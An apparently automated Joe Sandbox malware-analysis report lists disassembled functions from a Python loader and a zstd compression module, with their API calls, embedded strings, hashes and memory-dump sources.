                                                                                                                                                                                                            • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                            • API String ID: 190572456-3109299426
                                                                                                                                                                                                            • Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction ID: 18214d0df65889b5a8c88de98d60f10d03da459692f6e550886dbe3ef67501c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC42E778A0FB43B5EA55AF19A890174B7A5AF04786BDA5135C80E3A2B4FF7CF514C320
                                                                                                                                                                                                            Function 00007FF8A7FF76F0 Relevance: 198.0, APIs: 61, Strings: 52, Instructions: 245COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyUnicode_FromString.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7704
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7717
                                                                                                                                                                                                            • PyErr_NewException.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7729
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7743
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7756
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF776C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF777F
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7795
                                                                                                                                                                                                            • PyTuple_New.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77A0
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77AE
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77BC
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77C7
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77D8
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77E3
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77F4
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7807
                                                                                                                                                                                                            • PyBytes_FromStringAndSize.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7819
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7831
                                                                                                                                                                                                            • PyErr_Format.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF784A
                                                                                                                                                                                                            • PyLong_FromUnsignedLongLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7857
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF786A
                                                                                                                                                                                                            • PyLong_FromUnsignedLongLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7877
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF788A
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78A0
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78B6
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78CC
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78E2
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78F8
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF790E
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7924
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF793A
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7950
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7966
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF797C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7992
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79A8
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79BE
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79D4
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79EA
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A00
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A16
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A2C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A42
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A55
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A6B
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A81
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A97
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AAD
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AC3
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AD9
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AEF
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B05
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B1B
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B31
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B47
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B5D
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B73
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B86
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B9C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7BB2
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7BC5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_$Constant$FromLong$Object$Long_$Tuple_$Item$Err_StringUnsigned$Bytes_ExceptionFormatSizeUnicode_
                                                                                                                                                                                                            • String ID: 0.17.0$BLOCKSIZELOG_MAX$BLOCKSIZE_MAX$CHAINLOG_MAX$CHAINLOG_MIN$COMPRESSION_RECOMMENDED_INPUT_SIZE$COMPRESSION_RECOMMENDED_OUTPUT_SIZE$COMPRESSOBJ_FLUSH_BLOCK$COMPRESSOBJ_FLUSH_FINISH$CONTENTSIZE_ERROR$CONTENTSIZE_UNKNOWN$DECOMPRESSION_RECOMMENDED_INPUT_SIZE$DECOMPRESSION_RECOMMENDED_OUTPUT_SIZE$DICT_TYPE_AUTO$DICT_TYPE_FULLDICT$DICT_TYPE_RAWCONTENT$FLUSH_BLOCK$FLUSH_FRAME$FORMAT_ZSTD1$FORMAT_ZSTD1_MAGICLESS$FRAME_HEADER$HASHLOG_MAX$HASHLOG_MIN$LDM_BUCKETSIZELOG_MAX$LDM_MINMATCH_MAX$LDM_MINMATCH_MIN$MAGIC_NUMBER$MAX_COMPRESSION_LEVEL$MINMATCH_MAX$MINMATCH_MIN$SEARCHLENGTH_MAX$SEARCHLENGTH_MIN$SEARCHLOG_MAX$SEARCHLOG_MIN$STRATEGY_BTLAZY2$STRATEGY_BTOPT$STRATEGY_BTULTRA$STRATEGY_BTULTRA2$STRATEGY_DFAST$STRATEGY_FAST$STRATEGY_GREEDY$STRATEGY_LAZY$STRATEGY_LAZY2$TARGETLENGTH_MAX$TARGETLENGTH_MIN$WINDOWLOG_MAX$WINDOWLOG_MIN$ZSTD_VERSION$ZstdError$__version__$could not create frame header object$zstd.ZstdError
                                                                                                                                                                                                            • API String ID: 1631004291-83254250
                                                                                                                                                                                                            • Opcode ID: a730aba727810c897bb5ec01f7f3dc1d7193724165707fcb41d1ae6353e0e4c8
                                                                                                                                                                                                            • Instruction ID: 35707b569b300d89108d9531d834f7b80e4fdb6da0fb68b16a81aed0860849e7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a730aba727810c897bb5ec01f7f3dc1d7193724165707fcb41d1ae6353e0e4c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1C12F65B1AF06A2EE049B15E9543783362EF59FD0F425035CC0E07BE09F7DA1A9C36A
                                                                                                                                                                                                            Function 00007FF7ACE855B0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                            • API String ID: 2238633743-1453502826
                                                                                                                                                                                                            • Opcode ID: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
                                                                                                                                                                                                            • Instruction ID: 5d20e367a171e35ee49b282444539146df545677df75b314cf85fa20483d0628
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E1E274A0FB83B8FE55EF15A981174A3A5AF04782BDA6031D80E362B4EF7CE4548370
                                                                                                                                                                                                            Function 00007FF8A7FF2070 Relevance: 114.0, APIs: 44, Strings: 21, Instructions: 257COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FromSet_StringUnicode_
                                                                                                                                                                                                            • String ID: BufferSegment$BufferSegments$BufferWithSegments$BufferWithSegmentsCollection$FrameParameters$ZstdCompressionDict$ZstdCompressionParameters$ZstdCompressionReader$ZstdCompressionWriter$ZstdCompressor$ZstdDecompressionReader$ZstdDecompressionWriter$ZstdDecompressor$backend_features$buffer_types$could not create empty set$could not create feature string$could not create feature string$could not create feature string$multi_compress_to_buffer$multi_decompress_to_buffer
                                                                                                                                                                                                            • API String ID: 906424990-911737791
                                                                                                                                                                                                            • Opcode ID: 98f6b64fc5cfed28aaac1be97f425b921864cea2004126d638fd4f466037605b
                                                                                                                                                                                                            • Instruction ID: 7ce54adce5ba446a899c8e7ee8d6af805a59414beb231f22268cf0d60b4a08f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98f6b64fc5cfed28aaac1be97f425b921864cea2004126d638fd4f466037605b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBE19F25A0BE07A1EE008F65F89427933A4FF55BD4F421136C81E576A4DF3CE1AA9368
                                                                                                                                                                                                            Function 00007FF8A7FFCEF0 Relevance: 105.3, APIs: 41, Strings: 19, Instructions: 344COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dict_$ItemString$Dealloc$LongLong_$Unsigned$From$Tuple_$Arg_Object_ParseSizeSsize_t
                                                                                                                                                                                                            • String ID: chain_log$chain_log$dict_size$dict_size$hash_log$hash_log$i:from_level$min_match$min_match$search_log$search_log$source_size$source_size$strategy$strategy$target_length$target_length$window_log$window_log
                                                                                                                                                                                                            • API String ID: 3792225418-1416251643
                                                                                                                                                                                                            • Opcode ID: 82a189cea4d14d714df1c7754b63fac26c0e11cd79387e4bb1c4381c2aa353ff
                                                                                                                                                                                                            • Instruction ID: 14c538ae58eb2bbf56863bb6d7138bdbf77257d699f2e5e85822613bba080349
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82a189cea4d14d714df1c7754b63fac26c0e11cd79387e4bb1c4381c2aa353ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35E15621A0BB46A2EE249F64A92437923A1FF55BE0F084235C91E077D4EFBCE655E314
                                                                                                                                                                                                            Function 00007FF8A8002E70 Relevance: 72.0, APIs: 33, Strings: 8, Instructions: 272COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fprintf$fflush$free$__stdio_common_vfprintfcalloc
                                                                                                                                                                                                            • String ID: Computing frequencies$Failed to allocate frequency table $Failed to allocate scratch buffers $Testing on %u samples of total size %u$Total number of testing samples is %u and is invalid.$Total number of training samples is %u and is invalid$Total samples size is too large (%u MB), maximum size is %u MB$Training on %u samples of total size %u
                                                                                                                                                                                                            • API String ID: 4272101749-2606287452
                                                                                                                                                                                                            • Opcode ID: 2b5d0cbf54732c0680928db9f97324d0add256bb0bb83bd9bb83ee452253a40b
                                                                                                                                                                                                            • Instruction ID: 9f73fc12a214b7883bfa9bdd7f555e2afb9ea618006ed119fab0daf6ff4fb129
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b5d0cbf54732c0680928db9f97324d0add256bb0bb83bd9bb83ee452253a40b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CC1B231A0AA42AAEF159F21E81427973A1FB59BC8F015135DE5E037E5DF3CE5A4C328
                                                                                                                                                                                                            Function 00007FF8A7FF9C90 Relevance: 72.0, APIs: 30, Strings: 11, Instructions: 266threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
